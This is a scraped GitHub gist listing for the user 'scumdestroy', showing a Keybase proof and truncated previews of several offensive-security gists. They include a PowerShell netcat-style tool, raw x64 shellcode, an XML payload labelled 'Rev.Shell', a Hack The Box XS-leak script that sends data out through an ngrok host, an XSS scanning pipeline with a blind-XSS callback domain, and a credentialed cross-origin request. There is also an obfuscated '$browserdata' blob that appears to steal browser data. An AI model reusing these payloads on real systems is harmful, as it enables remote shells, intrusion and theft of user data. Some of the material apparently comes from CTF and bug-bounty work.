scumdestroy

Keybase proof

I hereby claim:

• I am scumdestroy on github.
• I am scumdestroy (https://keybase.io/scumdestroy) on keybase.
• I have a public key ASASXW521FiI8a2jQtGEpj-qEwk8t5Z0zFJkzgeMmZ6hDAo

To claim this, I am signing this object:

scumdestroy

function mamacat
{
  param(
    [alias("Client")][string]$c="",
    [alias("Listen")][switch]$l=$False,
    [alias("Port")][Parameter(Position=-1)][string]$p="",
    [alias("Execute")][string]$e="",
    [alias("ExecutePowershell")][switch]$ep=$False,
    [alias("Relay")][string]$r="",
    [alias("UDP")][switch]$u=$False,

scumdestroy

\x48\x31\xc9\x48\x81\xe9\xc0\xff\xff\xff\x48\x8d\x05\xef\xff\xff\xff\x48\xbb\x25\x94\x3c\x53\x4e\xad\x35\xd2\x48\x31\x58\x27\x48\x2d\xf8\xff\xff\xff\xe2\xf4\xd9\xdc\xbf\xb7\xbe\x45\xf9\xd2\x25\x94\x7d\x02\x0f\xfd\x67\x9a\x14\x46\x59\x1b\xc5\xff\x55\x9a\xae\xc6\x24\x02\x18\xe5\xbe\x80\x05\xdc\xb7\x21\x1e\xe0\x04\x1b\x6d\x9b\x8b\x19\x04\xe5\x04\x12\x89\xa8\x5d\x2f\x4c\x81\x15\x93\xe4\x5d\x31\x12\x4f\x6c\xd7\x3f\x77\xd5\x6d\x1b\xc5\xff\x15\x59\x67\xa8\x74\x52\x9e\xcb\xb4\xaa\x3d\x9f\x3e\x5c\xcb\xdf\x35\xd2\x25\x1f\xbc\xdb\x4e\xad\x35\x9a\xa0\x54\x48\x34\x06\xac\xe5\x96\xae\xd4\x1c\x03\xc5\xe5\x2d\x9b\x24\x44\xdf\x05\x03\x9c\xfc\x9a\xda\x5d\x7d\xd8\x7a\x25\x7d\xd3\xf3\xdc\x0d\x93\x0f\x6c\xfc\xdf\x89\xd5\x3d\x92\x76\x4d\x40\x23\x69\x97\x70\x77\x46\xe8\x0c\x03\x50\x4c\x64\x17\xc5\xed\x11\x9b\x24\x44\x5a\x12\xc5\xa1\x7d\x96\xae\xd4\x20\x1a\x4f\x7d\x74\x59\x21\x1c\x7d\x0b\x0f\xf5\x6b\x9a\x24\x44\x65\x09\x0f\xf5\x74\x8b\x64\xce\x74\xd0\xa2\x8d\x74\x80\xda\x74\x64\x12\x17\xf7\x7d\x59\x37\x7d\x77\xac\xb1\x52\x68\x9b\x9b

scumdestroy

<html>
<script>
var local_ip = '127.0.0.1:1337';
var url = "http://${local_ip}/api/entries/search?q="
var ngrok = '3b3b-2600-6c50-7b7f-4c50-e133-2ebe-33a2-360b.ngrok.io';
var flag = 'HTB{';
var char_list = '!@abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-' ;

async function getChunck(char){
	return new Promise((resolve, reject)=>{

scumdestroy

<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
  <files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
    <d2p1:string>Rev.Shell</d2p1:string>
  </files>
  <parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
    <assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
    <compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
    <coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
    <embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />

scumdestroy

#!/bin/sh

echo "\nTIME TO DROP OSBOMBS ON YOU, BOYEEEEEE\n»»————-　☠　————-««\n""

echo "HERE COME DA ASSETS\n»»————-　☠　————-««\n"
assets
cat "/root/.osmedeus/storages/$1/assets/*" | tee ~/opps/osmedeus-$1

echo "\n\n HTTP OK THEN \n»»————-　☠　————-««\n"
cat "/root/.osmedeus/storages/$1/http/*" | tee -a  ~/opps/osmedeus-$1

scumdestroy

#/bin/bash


hakrawler -url "${1}" -plain -usewayback -wayback | grep "${1}" | grep "=" | egrep -iv ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff
|woff2|ico|pdf|svg|txt|js)" | qsreplace -a | kxss | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | dalfox pipe -b https://scumde
stroy.xss.ht

scumdestroy

var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
    if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
        alert(xhr.responseText);
    }
}
http://xhr.open('GET', 'http://targetapp/api/v1/user', true); 
xhr.withCredentials = true; 
xhr.send(null);

scumdestroy

@( 46, 62, 65, 112, 64, 111, 111, 110, 59, 66, 107, 60, 67, 67, 61, 65, 107, 65, 59, 66, 59, 65, 60, 112, 61, 108, 107, 108, 61, 67, 108, 64, 110, 66, 108, 64, 66, 112, 62, 64, 109, 110, 62, 64, 65, 61, 62, 110, 60, 60, 60, 65, 67, 61, 110, 112, 109, 63, 59, 108, 61, 67, 61, 63, 66, 71, 49, 90, 49, 53, 49, 93, 42, 49, 69, 46, 62, 65, 66, 60, 63, 62, 62, 109, 109, 67, 61, 109, 58, 112, 108, 63, 58, 111, 58, 61, 109, 108, 112, 65, 64, 62, 107, 63, 62, 64, 67, 61, 109, 66, 111, 61, 108, 58, 65, 63, 109, 107, 65, 64, 61, 112, 61, 112, 110, 108, 108, 67, 110, 111, 67, 63, 108, 59, 61, 61, 58, 111, 63, 109, 62, 62, 108, 112, 63, 63, 59, 60, 61, 61, 63, 109, 107, 107, 63, 59, 62, 62, 60, 112, 59, 107, 59, 63, 67, 110, 66, 66, 65, 65, 108, 107, 59, 65, 67, 107, 107, 63, 60, 64, 66, 64, 60, 62, 110, 62, 60, 58, 58, 107, 59, 110, 59, 65, 58, 109, 66, 67, 61, 107, 110, 64, 61, 109, 71, 49, 64, 49, 53, 44, 44, 53, 49, 64, 49, 53, 44, 44, 53, 44, 44, 53, 44, 44, 53, 44, 44, 53, 44, 44, 53, 44, 44, 53, 44, 44, 53, 44, 44, 

scumdestroy

$browserdata = "==QKoU2cvx2QuMEZVNGejRUMsVmTzREbOtGN0R2Z1NXSpFEMsh3TTNnaLdjYURHZz4mWURXTwQzQ3tWUwdFa5ZGajB1VGZHb4I3SpN1UyxkY1VXW2gkSPVnQ2AXaDFDNPVzaXxkeLZlU3ZGRzRHepFmci1GekBFMxYVW4Yld1x0NuZnc3IWW1FTU0o0ZqdEaDJlVJVkeWh1REplZ05Ua2k3QoB1U2oGdiRmTO5kTWVHTLl2QZpWOHpmTnlDbsp1dZFVZ3h3Zod2UmFEaLN2SN5UQHxkTK1mdipGZBh2MWBVQJh1SzZTTx50cSVmbDFFZrhEN2cVY5h0NVJla48WNVpXN2A3YxE1aJZ2arpXdChTYwgjb5ZFbhpmSklTNOJGdKlmewEXS4BDRzZHa4lzbXpkNxRVY3FmMRZkYadlZ4gmVxYTOJt0batkQ3F0VWFWU3MzazcDb4lnMD9kQE9GTVJmULNDSpFnToZVQ0kXRtp2UzMTYLBnY2lnVDxUezIjWIdWVWp1dI10b6hDd3tGSnF3VMdDdkFTNvZWdUpkb3UGTB5kV3gFO2JEcZNlayFWV65UZ2tUM0knRMVEcq1mNWpGVpVGbRl3dWhUQmV3S1R0Y5J0dN1mZwNWeGRXYrd1b3RiCgAiCN0nCNkCKoNXdsZkLr5mNBFVQ1kkVSJVehJFeL9mezJHSmlnaClmS2hDSUdDM0YlYvd2bBZ0c25mc2RFM1lTczNmQYZnVIlGRmdnUPFmUYpVMHRCIgACIgoQDp8WO4NTMZJUd2EFS540N1EDdiZEd4NENSdkTxImYzcWbBN3cPFFSNhTQkZ2RUdkb5I0M1p2TGhnTVhmVCRjWMdGdyJWbq5GaPx2cMNjaxZGTQV3N2ZXTxYVMVBTNj1mcWtWNo1UOjNXULlWRitEbyoGeHFUby82QpVVcpRzcwN1S1U3ZTVWR15GNJZTNxRDZZNXSZpWdsJVNlFEWWVENTNkM5pmM4Z0MzNDMOlXV3d1MzoVY